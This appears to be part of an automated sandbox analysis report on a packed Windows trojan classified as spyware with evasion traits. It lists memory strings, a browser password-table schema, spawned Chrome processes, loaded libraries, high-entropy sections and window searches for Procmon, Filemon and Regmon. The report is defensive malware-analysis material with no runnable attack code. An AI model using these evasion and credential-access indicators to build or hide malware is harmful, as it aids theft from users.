        Source: file.exe, 00000000.00000003.2065805766.0000000005811000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060592058.000000000595B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2074003184.0000000005969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2070464664.0000000005804000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066572141.00000000007F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2065252461.00000000058EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066454251.000000000538B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2070214443.000000000592C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2065535324.0000000005810000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2072772225.000000000595C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2062220834.00000000058C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2073867259.0000000005808000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2070335700.0000000005A5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2067466028.0000000005802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2065111251.0000000005804000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2064226889.00000000058EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2061098255.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2069751648.0000000005923000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2062424235.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2059657459.0000000005803000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2062680815.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066032056.0000000005802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060089606.00000000058A5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060354417.000000000594F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060748144.00000000058BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060670666.000000000580E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2072508497.0000000005A9A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066160743.00000000058F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2067618347.0000000005905000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060293478.00000000058A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2062082579.0000000005802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2074307254.000000000596B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2072115189.0000000005805000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2065685189.0000000005904000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2074718726.0000000005ACF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2064969515.00000000059CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2063859514.00000000058D4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2062956763.000000000599B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066287719.00000000059EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2073315750.0000000005961000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2064442245.0000000005802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2073046219.000000000595B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2069055207.000000000580C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066741581.0000000005904000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066397195.000000000580B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2076161006.0000000005802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2072301757.0000000005950000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2068896749.0000000005929000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2058414419.000000000546E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060430900.0000000005802000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2068778882.0000000005807000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2069507438.0000000005924000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2073587713.0000000005809000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2071695291.000000000580D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2067192625.000000000590C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2058638291.0000000005807000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2071890387.0000000005951000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2059742954.0000000005897000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2069874335.0000000005806000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2061183735.00000000058B5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2069342547.000000000580D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2075639466.000000000597E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2067746653.0000000005A13000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2062512903.00000000058C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2063073476.000000000580B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2064541310.00000000058F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2075854027.0000000005806000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2061272182.0000000005967000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2063988626.00000000059B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2070810942.0000000005A7A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2073178901.0000000005807000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2066517041.0000000005367000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2075997184.0000000005977000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2076314296.000000000597E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2068536555.0000000005811000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2058489068.000000000580E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2071085039.0000000005947000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2068129689.0000000005919000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2070629006.000000000593C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2063360720.0000000005804000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2060929895.0000000005806000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2073726909.0000000005964000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9993084016393443
        Source: file.exeStatic PE information: Section: jvnpwyzl ZLIB complexity 0.9948260996254968
        Source: file.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/58@7/6
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: file.exe, 00000000.00000003.1815427231.0000000005365000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.1814510876.0000000005398000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1916,i,1287654970835858718,17769345937840610954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1900,i,13827317004684261514,15801404464628299724,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=1916,i,1287654970835858718,17769345937840610954,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2004 --field-trial-handle=1900,i,13827317004684261514,15801404464628299724,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: file.exeStatic file information: File size 1846784 > 1048576
        Source: file.exeStatic PE information: Raw size of jvnpwyzl is bigger than: 0x100000 < 0x198e00
        Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
        Source: file.exeStatic PE information: real checksum: 0x1c4f50 should be: 0x1cf5bf
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: .idata
        Source: file.exeStatic PE information: section name:
        Source: file.exeStatic PE information: section name: jvnpwyzl
        Source: file.exeStatic PE information: section name: ubzpnpef
        Source: file.exeStatic PE information: section name: .taggant
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: C:\Users\user\Desktop\file.exeCode function: 0_3_05372917 push eax; retf 007Bh0_3_05372985
        Source: file.exeStatic PE information: section name: entropy: 7.978865127343408
        Source: file.exeStatic PE information: section name: jvnpwyzl entropy: 7.954011898196479

        Boot Survival

        barindex
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
        Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
